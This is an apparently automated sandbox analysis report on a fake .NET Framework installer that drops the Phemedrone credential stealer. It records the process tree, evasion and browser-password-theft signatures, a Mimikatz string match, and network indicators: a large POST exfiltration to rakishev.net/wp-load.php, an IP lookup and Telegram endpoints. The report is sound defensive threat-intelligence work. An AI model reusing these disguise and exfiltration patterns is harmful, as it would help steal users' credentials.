Windows Analysis Report
dotNetFx40_Full_setup.exe

Overview

General Information

Sample Name:dotNetFx40_Full_setup.exe
Analysis ID:1319489
MD5:5d4392b56aa4ebac400bbe86fe5d0767
SHA1:a68a6004e111ba899254aa015d93706037c447ff
SHA256:a604eed1325b12671370e268783cfa74f8675a468492ff98416187d73768b4af
Tags: 32 dropper exe PhemedroneStealer
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Telegram Recon
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Yara detected Phemedrone Stealer
Machine Learning detection for sample
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Generic Downloader
.NET source code contains very large strings
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Modifies existing windows services
Drops PE files
Found evasive API chain checking for process token information
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • dotNetFx40_Full_setup.exe (PID: 6744 cmdline: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe MD5: 5D4392B56AA4EBAC400BBE86FE5D0767)
    • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • G5K9HNJ7.exe (PID: 6860 cmdline: "C:\ProgramData\Start Menu\G5K9HNJ7.exe" MD5: 53406E9988306CBD4537677C5336ABA4)
      • Setup.exe (PID: 7012 cmdline: C:\6c8944922f7b98d0b6cd82b768\\Setup.exe /x86 /x64 /ia64 /web MD5: 006F8A615020A4A17F5E63801485DF46)
        • WINWORD.EXE (PID: 2284 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
          • splwow64.exe (PID: 6936 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
    • EQB4OREJ.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe" MD5: AE881BAA8C3A00A94E5994826BDAC3AA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security |
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

Source | Rule | Description | Author | Strings
00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744 | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744 | Invoke_Mimikatz | Detects Invoke-Mimikatz String | Florian Roth |
              • 0x1708:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
              • 0x163506:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
              • 0x1a2ffc:$x2: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm
Process Memory Space: EQB4OREJ.exe PID: 6896 | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
3.0.EQB4OREJ.exe.480000.0.unpack | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
3.0.EQB4OREJ.exe.480000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
0.2.dotNetFx40_Full_setup.exe.13314658.1.unpack | JoeSecurity_PhemedroneStealer | Yara detected Phemedrone Stealer | Joe Security |
                          No Sigma rule has matched
                          No Snort rule has matched

                          AV Detection

                          Source: http://rakishev.net/wp-load.php, Avira URL Cloud: Label: malware
                          Source: dotNetFx40_Full_setup.exe, Virustotal: Detection: 56%
                          Source: dotNetFx40_Full_setup.exe, ReversingLabs: Detection: 51%
                          Source: dotNetFx40_Full_setup.exe, Avira: detected
                          Source: rakishev.net, Virustotal: Detection: 5%
                          Source: http://rakishev.net/wp-load.php, Virustotal: Detection: 11%
                          Source: http://rakishev.net, Virustotal: Detection: 5%
                          Source: dotNetFx40_Full_setup.exe, Joe Sandbox ML: detected
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00217C12 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,DecryptFileW,GetLastError,2_2_00217C12
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021751D CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,2_2_0021751D
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159B176 CryptUnprotectData,3_2_00007FFDA159B176
                          Source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exeCode function: 3_2_00007FFDA159B25B CryptUnprotectData,3_2_00007FFDA159B25B
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9517D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_6C9517D1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938094 CryptMsgGetAndVerifySigner,4_2_6C938094
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938083 CryptQueryObject,4_2_6C938083
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9380A5 CryptHashPublicKeyInfo,SetLastError,4_2_6C9380A5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C9380D5 CryptMsgGetParam,SetLastError,4_2_6C9380D5
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C938114 CryptDecodeObject,SetLastError,4_2_6C938114
                          Source: dotNetFx40_Full_setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1033\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1025\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1028\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1030\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1031\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1029\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1036\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1035\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1032\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1038\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1037\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1040\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1041\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1042\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1044\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1043\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1046\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1045\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1055\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1053\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2052\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\1049\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3082\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\2070\eula.rtfJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeFile created: C:\6c8944922f7b98d0b6cd82b768\3076\eula.rtfJump to behavior
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: dotNetFx40_Full_setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: sqmapi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005B21000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813403498.0000000000F52000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813241400.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000003.813657014.0000000000F59000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303901253.000000006C621000.00000020.00000001.01000000.0000000B.sdmp, sqmapi.dll.2.dr
                          Source: Binary string: SetupEngine.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, SetupEngine.dll.2.dr
                          Source: Binary string: boxstub.pdb source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, G5K9HNJ7.exe, G5K9HNJ7.exe, 00000002.00000003.797545019.0000000000F28000.00000004.00000020.00020000.00000000.sdmp, G5K9HNJ7.exe, 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe, 00000002.00000000.797030009.0000000000211000.00000020.00000001.01000000.00000006.sdmp, G5K9HNJ7.exe.0.dr
                          Source: Binary string: SetupUtility.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
                          Source: Binary string: Setup.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.00000000056C5000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000000.815079192.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe, 00000004.00000002.3249976406.0000000000031000.00000020.00000001.01000000.00000009.sdmp, Setup.exe.2.dr
                          Source: Binary string: SetupResources.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
                          Source: Binary string: SetupUi.pdb source: G5K9HNJ7.exe, 00000002.00000003.812362360.0000000005A75000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0021774A
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_002192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_002192BB
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_0021A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0021A7B1
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C638097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_6C638097
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C624281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_6C624281
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C925B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_6C925B82
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C92410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_6C92410A

                          Networking

                          Source: unknownDNS query: name: ip-api.com
                          Source: Yara matchFile source: 0.2.dotNetFx40_Full_setup.exe.13314658.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.0.EQB4OREJ.exe.480000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\EQB4OREJ.exe, type: DROPPED
                          Source: global traffic, HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                          Source: global traffic, HTTP traffic detected: POST /wp-load.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9 | Host: rakishev.net | Content-Length: 486789 | Expect: 100-continue | Connection: Keep-Alive
                          Source: Joe Sandbox View, IP Address: 208.95.112.1
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: http://ip-api.com/json/?fields=11827
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rakishev.net
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rakishev.net/wp-load.php
                          Source: EQB4OREJ.exe, 00000003.00000002.970955831.0000000002700000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://api.telegram.org/bot
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://t.me/TheDyer
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000000.799184913.0000000000482000.00000002.00000001.01000000.00000007.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002821000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002738000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.00000000026E1000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.970955831.0000000002977000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe, 00000003.00000002.971799704.0000000012939000.00000004.00000800.00020000.00000000.sdmp, EQB4OREJ.exe.0.drString found in binary or memory: https://t.me/reyvortex
                          Source: unknownDNS traffic detected: queries for: ip-api.com
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C964B54 URLDownloadToFileW,4_2_6C964B54
                          Source: global traffic, HTTP traffic detected: GET /json/?fields=11827 HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknown, HTTP traffic detected: POST /wp-load.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----------------------------8dbc4f2ae4bdbe9 | Host: rakishev.net | Content-Length: 486789 | Expect: 100-continue | Connection: Keep-Alive

                          System Summary

                          Source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                          Source: dotNetFx40_Full_setup.exe, Program.csLong String: Length: 1299214
                          Source: dotNetFx40_Full_setup.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Process Memory Space: dotNetFx40_Full_setup.exe PID: 6744, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C944E0D ExitWindowsEx,4_2_6C944E0D
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: String function: 0021854A appears 42 times
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: String function: 00234DF4 appears 54 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C976E1A appears 546 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C94833E appears 579 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C49E8E8 appears 173 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C4B265B appears 227 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C9139AD appears 43 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C968B7A appears 109 times
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: String function: 6C9485BC appears 56 times
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00217A0A: GetDriveTypeW,SetErrorMode,SetErrorMode,SetErrorMode,CreateFileW,DeviceIoControl,CloseHandle,SetErrorMode,2_2_00217A0A
                          Source: SetupResources.dll16.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                          Source: SetupResources.dll1.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll4.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll22.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll14.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll17.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll10.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll13.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll19.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll9.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll5.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll2.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll16.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll21.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll18.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll15.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll8.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll23.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll12.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll3.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll6.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll20.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll0.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll11.2.drStatic PE information: No import functions for PE file found
                          Source: SetupResources.dll7.2.drStatic PE information: No import functions for PE file found
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.804432144.000000001303C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exe, 00000000.00000002.807310962.000000001B650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs dotNetFx40_Full_setup.exe
                          Source: dotNetFx40_Full_setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dotNetFx40_Full_setup.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/135@2/2
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exeCode function: 2_2_00218DAE FormatMessageW,GetLastError,LocalFree,2_2_00218DAE
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C93E9B4 ChangeServiceConfigW,4_2_6C93E9B4
                          Source: C:\6c8944922f7b98d0b6cd82b768\Setup.exeCode function: 4_2_6C4A7A10 LoadResource,LockResource,SizeofResource,4_2_6C4A7A10
                          Source: dotNetFx40_Full_setup.exeVirustotal: Detection: 56%
                          Source: dotNetFx40_Full_setup.exeReversingLabs: Detection: 51%
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\dotNetFx40_Full_setup.exe C:\Users\user\Desktop\dotNetFx40_Full_setup.exe
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\dotNetFx40_Full_setup.exeProcess created: C:\ProgramData\Microsoft\Windows\Start Menu\G5K9HNJ7.exe "C:\ProgramData\Start Menu\G5K9HNJ7.exe"
